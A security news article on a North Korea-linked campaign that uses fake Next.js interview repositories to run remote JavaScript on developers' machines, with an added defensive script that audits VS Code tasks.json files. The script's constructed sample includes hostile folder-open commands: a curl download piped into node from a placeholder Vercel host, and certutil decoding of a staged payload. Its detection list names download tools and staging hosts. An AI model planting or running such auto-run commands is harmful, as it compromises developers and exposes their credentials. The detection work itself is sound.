
A “coordinated developer-targeted campaign” uses malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into running the projects and establish permanent access to compromised machines.
“This activity is consistent with a broader group of threats that use job-themed decoys to blend into developers’ daily workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report released this week.
The tech giant said the campaign features multiple entry points that all lead to the same outcome: attacker-controlled JavaScript is fetched at runtime and executed to facilitate command and control (C2).
The attack relies on the attacker setting up a fake repository on a trusted developer platform such as Bitbucket, using a name like “Cryptan-Platform-MVP1”, and tricking job-seeking developers into running it as part of a technical evaluation.
Further analysis of the identified repositories reveals three distinct execution paths that are triggered in different ways, but with the ultimate goal of executing attacker-controlled JavaScript directly in memory.
1. Opening a Visual Studio Code workspace. The repository includes a Microsoft Visual Studio Code (VS Code) project whose workspace automation configuration (a task configured with runOn: "folderOpen") executes malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project.
2. Build-time execution during application development. Simply running the development server manually via 'npm run dev' executes malicious code embedded in a modified JavaScript library disguised as jquery.min.js, which fetches the Vercel-hosted JavaScript loader. The retrieved payload is executed in memory by Node.js.
3. Environment exfiltration and server startup via dynamic remote code execution. Launching the application backend runs malicious loader logic hidden within the backend module or root file. The loader sends the process environment to an external server and executes the JavaScript received in response in memory, inside the Node.js server process.
Microsoft noted that all three methods lead to the same JavaScript payload, which profiles the host and periodically polls a registration endpoint to obtain a unique “instanceId” identifier. That identifier is sent on later polls so the server can correlate the host’s activity.
It can also run server-provided JavaScript in memory, paving the way for a second-stage controller that turns the initial foothold into a persistent access path: it connects to another C2 server to receive tasks and executes them in memory to minimize any trace left on disk.
Attack chain overview
“This controller maintains stability and session continuity, posts error telemetry to reporting endpoints, and includes retry logic for resiliency,” Microsoft said. “It can also track spawned processes, stop managed activities, and gracefully terminate them on command. Stage 2 goes beyond on-demand code execution to support operator-driven discovery and extraction.”
Although the Windows maker did not attribute this activity to a specific attacker, using VS Code tasks and Vercel domains to stage malware is a tactic that has been employed by North Korea-linked hackers associated with a long-running campaign known as “Contagious Interview.”
The ultimate goal of these efforts is to gain the ability to deliver malware to developer systems. Developer systems often contain sensitive data such as source code, secrets, and credentials, which can provide an opportunity to penetrate deeper into the target network.
GitHub gists in VS Code tasks.json in place of Vercel URLs
Abstract Security said in a report released Wednesday that it has observed a shift in the threat actor’s tactics, notably the proliferation of alternative staging servers in VS Code task commands in place of Vercel URLs. These include scripts hosted on GitHub gists (gist.githubusercontent[.]com) that download and execute the next-stage payload, and URL shorteners such as short[.]gy used to hide the Vercel URL.
The cybersecurity firm said it also identified a malicious npm package linked to the campaign, named “eslint-validator”, that retrieves and executes an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware called BeaverTail.
Additionally, a malicious VS Code task embedded within a GitHub repository has been found to launch a Windows-only infection chain: it runs a batch script that downloads the Node.js runtime (if not already present) on the host and uses the certutil program to decode blocks of code contained within the script. The decoded script is then executed with the downloaded Node.js runtime to deploy PyArmor-protected Python malware.
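The following is an added example written for this article, not code from Microsoft, Abstract Security or any project named here. It shows the defender-side check a repository reviewer or endpoint tool could run against a project's .vscode/tasks.json before the folder is trusted: it flags tasks that run automatically on folder open (the runOn: "folderOpen" trigger described in the three execution paths above) and whose command downloads, pipes, decodes or inline-evaluates remote content, including the Vercel, GitHub gist and URL-shortener staging hosts and the certutil decoding step described in the paragraphs just above. The tasks.json text is constructed for the example; hostnames such as example-app.vercel.app are placeholders.

```javascript
// Added example (not Microsoft's, Abstract Security's or any project's code):
// audit a VS Code .vscode/tasks.json for auto-run tasks that fetch or execute
// remote content. SAMPLE_TASKS_JSON below is constructed for this example.

// tasks.json is JSONC: comments and trailing commas are allowed, so strip them
// first rather than letting JSON.parse fail on a file VS Code would still run.
function stripJsonc(text) {
  let out = "";
  let inStr = false;
  for (let i = 0; i < text.length; i++) {
    const c = text[i];
    const n = text[i + 1];
    if (inStr) {
      out += c;
      if (c === "\\" && n !== undefined) { out += n; i++; } // keep escapes intact
      else if (c === '"') inStr = false;
    } else if (c === '"') {
      inStr = true;
      out += c;
    } else if (c === "/" && n === "/") {
      while (i < text.length && text[i] !== "\n") i++; // drop line comment
      out += "\n";
    } else if (c === "/" && n === "*") {
      const end = text.indexOf("*/", i + 2); // drop block comment
      i = end < 0 ? text.length : end + 1;
    } else {
      out += c;
    }
  }
  // Trailing commas before } or ] (naive: assumes none inside string values).
  return out.replace(/,(\s*[}\]])/g, "$1");
}

// Indicators over the flattened command line, mirroring the reported tradecraft:
// download tools, piping into an interpreter, inline node evaluation, certutil
// decoding, and the staging hosts named in the reporting above.
const INDICATORS = [
  [/\b(?:curl|wget|Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b/i, "downloads remote content"],
  [/\|\s*(?:sh|bash|zsh|node|powershell|pwsh|python3?)\b/i, "pipes output into an interpreter"],
  [/\bnode(?:\.exe)?\s+(?:-e|--eval)\b/i, "evaluates inline JavaScript"],
  [/\bcertutil(?:\.exe)?\b[^\n]*-decode/i, "decodes a payload with certutil"],
  [/https?:\/\/[^\s'"]*(?:vercel\.app|gist\.githubusercontent\.com|short\.gy)\b/i,
    "fetches from a staging host seen in this campaign"],
];

// command and args may be strings or { value, quoting } objects, and may also
// live under an OS-specific block (windows/linux/osx); gather all of them.
function argText(a) {
  return typeof a === "string" ? a : (a && typeof a.value === "string" ? a.value : "");
}
function flattenCommand(task) {
  const parts = [];
  for (const scope of [task, task.windows, task.linux, task.osx]) {
    if (!scope) continue;
    if (scope.command !== undefined) parts.push(argText(scope.command));
    for (const a of scope.args || []) parts.push(argText(a));
  }
  return parts.join(" ");
}

// Returns one finding per task: "block" when an auto-run task matches an
// indicator, "review" when only one of the two holds, "ok" otherwise.
function auditTasksJson(text) {
  const doc = JSON.parse(stripJsonc(text));
  return (doc.tasks || []).map((task) => {
    const command = flattenCommand(task);
    const reasons = INDICATORS.filter(([re]) => re.test(command)).map(([, why]) => why);
    const autoRun = Boolean(task.runOptions && task.runOptions.runOn === "folderOpen");
    let verdict = "ok";
    if (autoRun && reasons.length) verdict = "block";
    else if (autoRun || reasons.length) verdict = "review";
    return { label: task.label || "(unlabelled)", autoRun, reasons, verdict, command };
  });
}

// Constructed sample: one routine task and two that follow the reported pattern.
const SAMPLE_TASKS_JSON = String.raw`{
  // constructed sample, not a real repository's file
  "version": "2.0.0",
  "tasks": [
    { "label": "lint", "type": "npm", "script": "lint", "problemMatcher": [] },
    {
      "label": "prepare", /* looks routine to a reviewer */
      "type": "shell",
      "command": "curl -s https://example-app.vercel.app/loader.js | node",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "cmd",
      "args": ["/c", "certutil -decode %TEMP%\\blob.txt %TEMP%\\stage.js && node %TEMP%\\stage.js"],
      "runOptions": { "runOn": "folderOpen" },
    }
  ]
}`;

for (const f of auditTasksJson(SAMPLE_TASKS_JSON)) {
  console.log(`${f.verdict.padEnd(6)} ${f.label}: ${f.reasons.join("; ") || "no indicators"}`);
}
```

Note that VS Code only fires folderOpen tasks after the developer grants Workspace Trust, so this check belongs before that prompt is answered, for example in a pre-clone review or a wrapper that inspects .vscode/ on checkout. A "review" verdict on a benign watch task is expected; the point is that "block" combines the automatic trigger with a remote fetch, which no legitimate interview project needs.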
Cybersecurity firm Red Asgard, which has also tracked the campaign extensively, said the attackers leveraged a crafted VS Code project that uses a runOn: "folderOpen" trigger to deploy the malware; for resiliency, the loader queries the Polygon blockchain and retrieves JavaScript stored within an NFT contract. The final payload is an information stealer that collects credentials and data from web browsers, cryptocurrency wallets, and password managers.
Distribution of staging infrastructure used by North Korean threat actors in 2025
“This developer-focused campaign shows how the hiring-themed ‘interview project’ can become a trusted path to remote code execution by blending into everyday developer workflows like opening repositories, running development servers, and launching backends,” Microsoft concludes.
To counter this threat, the company recommends that organizations harden trust boundaries in developer workflows, enforce strong authentication and conditional access, practise strict credential hygiene, apply least privilege to developer accounts and identities, and isolate infrastructure where possible.
The development comes after GitLab announced it had banned 131 unique accounts that were involved in distributing malicious code projects related to the Contagious Interview campaign and the rogue IT worker scheme known as Wagemole.
“Threat actors typically originate from consumer VPNs when communicating with GitLab.com to distribute malware, but intermittently may originate from IP addresses on dedicated VPS infrastructure or perhaps laptop farms,” said GitLab’s Oliver Smith. “In almost 90% of cases, the attacker used a Gmail email address to create the account.”
According to the software development platform, in more than 80% of cases the attackers leveraged at least six legitimate services to host their malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Of these, Vercel was the most commonly used, with threat actors relying on the web development platform at least 49 times in 2025.
“In December, we observed a group of projects executing malware via VS Code tasks by piping remote content to a native shell or running custom scripts that decoded the malware from binary data in fake font files,” Smith added, corroborating the aforementioned Microsoft findings.
Evaluating the organizational chart of North Korea’s IT worker cells
GitLab also discovered private projects “most likely” controlled by the operators of North Korean IT worker cells, including detailed financial and personnel records showing more than $1.64 million in revenue from Q1 2022 to Q3 2025. The projects included over 120 spreadsheets, presentations, and documents tracking individual team members’ quarterly revenue performance.
“The records demonstrate that these operations operate as structured enterprises with defined goals and operating procedures, and close hierarchical oversight,” GitLab noted. “This cell’s proven ability to develop facilitators around the world provides a high degree of operational resilience and money laundering flexibility.”
GitHub accounts associated with North Korean IT workers
In a report released earlier this month, Okta said the “vast majority” of interviews by the IT workers do not progress to second interviews or offers, but noted that they “learn from their mistakes” and exploit the fact that third-party staffing companies are less likely to conduct rigorous background checks, seeking temporary contract work as software developers placed through such companies.
“However, some actors seem to be more competent at creating personas and passing screening interviews,” the company added. “There is a kind of natural selection at work for the IT workers. The most successful actors are extremely prolific, each scheduling hundreds of interviews.”
